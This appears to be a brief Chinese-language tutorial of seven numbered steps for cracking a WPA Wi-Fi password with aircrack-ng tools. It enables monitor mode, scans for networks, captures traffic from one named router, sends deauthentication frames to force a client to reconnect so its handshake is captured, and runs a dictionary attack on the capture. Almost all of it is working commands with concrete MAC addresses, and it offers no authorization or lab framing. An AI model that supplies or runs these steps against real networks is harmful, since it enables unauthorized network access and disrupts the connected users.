1.airmon-ng start wlan0 + CH(频段号)
(启动网卡监听模式)
2.启动后ifconfig
查看一下,如果网卡名加上了mon后则成功,(wlan0mon)
3.airodump-ng wlan0mon
(扫描周围WIFI信息)
到此重新开一个终端!
4.
airodump-ng -w nenew -c 9 --bssid C8:3A:35:1B:E6:E8 wlan0mon
查看选中路由器信息及下面的终端
到此重新开一个终端!
5.
aireplay-ng -0 10 -a C8:3A:35:1B:E6:E8 -c 00:C0:CA:39:F8:9A wlan0mon
使终端断开连接,重新连接时获取握手包(-a 路由器mac地址 -c 路由器下终端mac地址)
6.跳到第4步查看是否抓取握手包 WPA handshake: D0:C7:C0:79:9C:88
7.aircrack-ng -w password.txt -b C8:3A:35:1B:E6:E8 nenew.cap 对抓到的握手包进行破解 (-w 字典 ,-b 路由器mac地址)